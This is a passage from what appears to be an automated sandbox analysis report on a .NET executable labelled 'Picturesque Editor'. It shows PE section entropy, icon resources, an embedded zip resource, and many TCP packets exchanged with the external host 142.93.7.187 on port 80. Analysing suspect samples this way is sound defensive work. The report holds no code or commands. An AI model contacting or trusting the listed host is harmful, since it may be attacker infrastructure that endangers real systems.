                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x1000000xc8548.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x1c40000x6950
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x1ca0000xc.reloc
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text

                                              Sections

                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              .text0x20000xfb0240xfb200False0.730614578148data7.41934248302IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                              .sdata0xfe0000x1e80x200False0.857421875data6.63844624893IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                              .rsrc0x1000000xc85480xc8600False0.816314868606data7.63005068838IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .reloc0x1ca0000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                              Resources

                                              NameRVASizeTypeLanguageCountry
                                              RT_ICON0x10047c0x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0
                                              RT_ICON0x1046a40x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 191989917, next used block 57969567
                                              RT_ICON0x106c4c0x10a8dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 1436266176, next used block 1436200639
                                              RT_ICON0x107cf40x468GLS_BINARY_LSB_FIRST
                                              RT_ICON0x10815c0x468GLS_BINARY_LSB_FIRST
                                              RT_ICON0x1085c40x10a8dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 1738321857, next used block 1738256320
                                              RT_ICON0x10966c0x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 544179868, next used block 175081371
                                              RT_ICON0x10bc140x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 7637919, next used block 7637919
                                              RT_ICON0x10fe3c0x10828dBase III DBT, version number 0, next free block index 40
                                              RT_ICON0x1206640x24d8PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                              RT_ICON0x122b3c0x468GLS_BINARY_LSB_FIRST
                                              RT_ICON0x122fa40x10a8dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 1738387650, next used block 1738322113
                                              RT_ICON0x12404c0x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 577734556, next used block 191924124
                                              RT_ICON0x1265f40x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 7637919, next used block 7637919
                                              RT_ICON0x12a81c0x10828dBase III DBT, version number 0, next free block index 40
                                              RT_ICON0x13b0440x2f360PNG image data, 256 x 256, 16-bit/color RGBA, non-interlaced
                                              RT_RCDATA0x16a3a40x5db52Zip archive data, at least v2.0 to extract
                                              RT_GROUP_ICON0x1c7ef80xe6data
                                              RT_VERSION0x1c7fe00x37cdata
                                              RT_MANIFEST0x1c835c0x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                              Imports

                                              DLLImport
                                              mscoree.dll_CorExeMain

                                              Version Infos

                                              DescriptionData
                                              Translation0x0000 0x04b0
                                              LegalCopyrightCopyright Oleg Pylypchak 2017 - 2021
                                              Assembly Version2.1.0.0
                                              InternalName.exe
                                              FileVersion2.1.0.0
                                              CompanyNameLNU
                                              LegalTrademarks
                                              CommentsImage eritor
                                              ProductNamePicturesque Editor
                                              ProductVersion2.1.0.0
                                              FileDescriptionPicturesque Editor
                                              OriginalFilename.exe

                                              Network Behavior

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Apr 12, 2021 15:25:02.776364088 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:02.777048111 CEST4974080192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:02.900579929 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:02.900882006 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:02.900895119 CEST8049740142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:02.901050091 CEST4974080192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:02.902010918 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.026987076 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.051784992 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.051810026 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.051826000 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.051841974 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.051856995 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.051872969 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.051888943 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.051907063 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.051923990 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.051939964 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.051945925 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.052031040 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.176145077 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.176175117 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.176192045 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.176211119 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.176228046 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.176244020 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.176265955 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.176284075 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.176300049 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.176317930 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.176340103 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.176345110 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.176359892 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.176378012 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.176394939 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.176417112 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.176419020 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.176436901 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.176445961 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.176455975 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.176470995 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.176476002 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.176493883 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.176513910 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.176513910 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.176541090 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.176567078 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.300709963 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.300745964 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.300767899 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.300790071 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.300811052 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.300832033 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.300853968 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.300856113 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.300875902 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.300899982 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.300920010 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.300921917 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.300936937 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.300940037 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.300944090 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.300965071 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.300971985 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.300986052 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.300993919 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.301008940 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.301013947 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.301031113 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.301038980 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.301052094 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.301054955 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.301073074 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.301079988 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.301095963 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.301099062 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.301116943 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.301124096 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.301137924 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.301140070 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.301156998 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.301158905 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.301177979 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.301178932 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.301197052 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.301198959 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.301223040 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.301235914 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.301243067 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.301254988 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.301266909 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.301289082 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.301295042 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.301301003 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.301318884 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.301322937 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.301341057 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.301343918 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.301364899 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.301364899 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.301417112 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.301424980 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.301446915 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.301469088 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.301491976 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.301512003 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.301512957 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.301537037 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.301547050 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.301559925 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.301577091 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.301584005 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.301599026 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.301605940 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.301625013 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.301645994 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.301673889 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.301702023 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.425812960 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.425858021 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.425887108 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.425915956 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.425951004 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.425982952 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.426012993 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.426065922 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.426096916 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.426129103 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.426157951 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.426204920 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.426239014 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.426265001 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.426338911 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.426340103 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.426343918 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.426376104 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.426405907 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.426445007 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.426491976 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.426496029 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.426537991 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.426575899 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.426613092 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.426644087 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.426677942 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.426706076 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.426733971 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.426753044 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.426757097 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.426763058 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.426790953 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.426825047 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.426855087 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.426887035 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.426914930 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.426930904 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.426937103 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.426944017 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.426970959 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.427000046 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.427027941 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.427054882 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.427062035 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.427062988 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.427103043 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.427129984 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.427141905 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.427159071 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.427186966 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.427213907 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.427228928 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.427236080 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.427243948 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.427273035 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.427306890 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.427308083 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.427340031 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.427366972 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.427396059 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.427409887 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.427414894 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.427423954 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.427450895 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.427476883 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.427479029 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.427508116 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.427541971 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.427583933 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.427592039 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.427598000 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.427634954 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.427638054 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.427674055 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.427711964 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.427748919 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.427786112 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.427788973 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.427809000 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.427824020 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.427864075 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.427870989 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.427912951 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.427949905 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.427988052 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.427994967 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.428014994 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.428028107 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.428066969 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.428103924 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.428142071 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.428154945 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.428159952 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.428189993 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.428234100 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.428268909 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.428272963 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.428276062 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.428306103 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.428345919 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.428375006 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.428392887 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.428433895 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.428472042 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.428478956 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.428484917 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.428508997 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.428548098 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.428584099 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.428621054 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.428658009 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.428670883 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.428678036 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.428704977 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.428746939 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.428786039 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.428786039 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.428793907 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.429426908 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.553210020 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.553309917 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.553356886 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.553421974 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.553440094 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.553445101 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.553450108 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.553483963 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.553512096 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.553538084 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.553586006 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.553589106 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.553594112 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.553627968 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.553664923 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.553675890 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.553683996 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.553704977 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.553742886 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.553749084 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.553752899 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.553780079 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.553817987 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.553823948 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.553828001 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.553857088 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.553900957 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.553903103 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.553908110 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.553946972 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.553983927 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.553993940 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.553997993 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.554023027 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.554061890 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.554063082 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.554066896 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.554100037 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.554136992 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.554136992 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.554142952 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.554176092 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.554214954 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.554223061 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.554227114 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.554267883 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.554300070 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.554311037 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.554315090 CEST4973980192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:03.554327965 CEST8049739142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:03.554363966 CEST4973980192.168.2.3142.93.7.187
